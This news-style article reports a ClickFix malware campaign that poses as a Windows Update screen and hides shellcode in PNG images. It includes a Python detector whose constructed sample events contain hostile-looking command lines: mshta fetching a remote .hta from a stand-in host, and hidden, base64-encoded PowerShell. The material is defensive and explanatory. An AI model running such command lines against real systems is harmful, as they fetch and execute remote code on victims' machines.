New ClickFix Malware Campaign Masquerades as Windows Update to Evade Detection
WASHINGTON, D.C. — Cybersecurity experts have uncovered a sophisticated new iteration of the ClickFix malware campaign that tricks users into installing malicious software by masquerading as legitimate Windows updates. This latest tactic exploits the trust users place in system prompts, using highly convincing fake update screens to coax victims into executing commands that unleash stealthy malware.
Unlike earlier versions of ClickFix, which relied on fake human verification pages, the current campaign presents a full-screen Windows update interface complete with progress bars and familiar messaging. Users are prompted to open the Run dialog box and paste a seemingly innocuous command from their clipboard. This command silently downloads a malware dropper that ultimately installs an infostealer designed to harvest passwords, cookies, and other sensitive information.
Researchers at Joe Security detailed how the attack chain begins with the execution of mshta.exe, which contacts a remote server to retrieve a script. To evade detection, the URLs involved use hex encoding and frequently rotate, complicating efforts by defenders to track malicious infrastructure. The script then launches obfuscated PowerShell code filled with extraneous instructions to confuse analysts.
What makes this campaign particularly difficult to detect is its use of steganography — a technique that hides data within other seemingly benign content. In this case, the malware’s next stage is concealed inside the pixel data of ordinary PNG image files. By subtly altering color values, especially in the red channel, the attackers embed shellcode that remains invisible to the naked eye and undetectable by conventional file scanning tools.
Once the infected image is processed, the embedded shellcode is extracted, decrypted, and reconstructed entirely in memory without ever being written to disk. This in-memory execution allows the malware to bypass many endpoint detection systems that rely on scanning files stored on the hard drive. The shellcode then injects itself into legitimate processes, further complicating efforts to identify and remove the infection.
The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has issued warnings about the increasing sophistication of malware campaigns leveraging social engineering and advanced evasion techniques. This ClickFix campaign exemplifies the evolving threat landscape where attackers exploit user trust and technical loopholes to bypass security defenses.
Microsoft’s own security teams have emphasized the importance of verifying update prompts through official channels and cautioning users against executing commands from untrusted sources. The company’s security portal offers guidance on recognizing legitimate updates and avoiding common phishing tactics.
Cybersecurity firms recommend that organizations employ behavioral detection tools and network monitoring to identify unusual PowerShell activity or unexpected outbound connections that may indicate infection. The FBI’s Cyber Division (FBI Cyber) also advises vigilance against social engineering attacks that mimic trusted system interfaces.
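The behavioral detection the article recommends can be expressed as a few rules over process-creation telemetry, matching the chain described earlier (Run dialog in explorer.exe launching mshta.exe with a remote, hex-encoded URL, which in turn launches hidden, encoded PowerShell). The following is an added example written for this article, not code from Joe Security or from any vendor it mentions; the log lines are constructed Sysmon-style key=value text, and the field names, the sample host 203.0.113.10 and the assumption that the hex encoding is percent-encoding or `\xNN` escapes are the author's, not indicators from the campaign.

```python
"""Flag process-creation events matching the ClickFix chain described above.

Constructed, Sysmon-like key=value log lines; field names, hosts and the
encoded-URL style are assumptions for illustration, not campaign indicators.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample events (not real telemetry). The Run dialog is hosted by
# explorer.exe, so a Run-dialog launch shows explorer.exe as the parent.
_STAGE2_B64 = base64.b64encode("Write-Host 'stage2'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    'EventID=1 ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta http://203.0.113.10/%75%70%64%61%74%65.hta"',
    'EventID=1 ParentImage=C:\\Windows\\System32\\mshta.exe '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -nop -w hidden -enc ' + _STAGE2_B64 + '"',
    'EventID=1 ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe"',
]

# key=value pairs; a value is either a double-quoted string or one token
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value log line into a dict (quoted values keep spaces)."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in KV_RE.finditer(line)}


def decode_hex_url(token: str) -> str:
    """Undo \\xNN escapes and percent-encoding so the analyst sees the real URL."""
    token = HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), token)
    return unquote(token)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE script text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable:" + b64[:32] + ">"


def analyze_event(ev: Dict[str, str]) -> List[Finding]:
    findings: List[Finding] = []
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    args = ev.get("CommandLine", "").split()

    if image.endswith("\\mshta.exe"):
        for arg in args[1:]:
            decoded = decode_hex_url(arg)
            if "://" in decoded:  # mshta fetching a script from a remote host
                rule = "mshta_hex_encoded_url" if decoded != arg else "mshta_remote_hta"
                findings.append(Finding(rule, image, decoded))
        if parent.endswith("\\explorer.exe"):
            findings.append(Finding("mshta_from_run_dialog", image, parent))

    if image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe"):
        lowered = [a.lower() for a in args]
        if any(a in ("-w", "-windowstyle") for a in lowered) and "hidden" in lowered:
            findings.append(Finding("powershell_hidden_window", image, " ".join(args)))
        for i, a in enumerate(lowered):
            # PowerShell accepts any unambiguous prefix of -EncodedCommand
            if a.startswith("-e") and "-encodedcommand".startswith(a) and i + 1 < len(args):
                findings.append(Finding("powershell_encoded_command", image,
                                        decode_encoded_command(args[i + 1])))
        if parent.endswith("\\mshta.exe"):
            findings.append(Finding("powershell_spawned_by_mshta", image, parent))
    return findings


def analyze_log(lines: List[str]) -> List[Finding]:
    return [f for line in lines for f in analyze_event(parse_event(line))]


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_EVENTS):
        print(f"{f.rule:32} {f.image}  ->  {f.detail}")
```

The rules are deliberately narrow: mshta.exe reaching out to a URL at all, an encoded URL in its arguments, and PowerShell started with a hidden window or an encoded command, each of which is unusual on a workstation and becomes high-confidence when chained through the explorer.exe to mshta.exe to powershell.exe parentage. Decoding the URL and the UTF-16LE payload in the alert saves the analyst the first step of triage.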
As cybercriminals continue to refine their methods, users are urged to remain cautious when prompted to install updates or run commands, especially when these requests come from unsolicited websites or unexpected pop-ups. Regularly updating software through official channels and maintaining robust endpoint protection remain critical defenses against campaigns like ClickFix.
For more information on protecting against malware and social engineering attacks, visit the U.S. Cybersecurity and Infrastructure Security Agency’s tips page.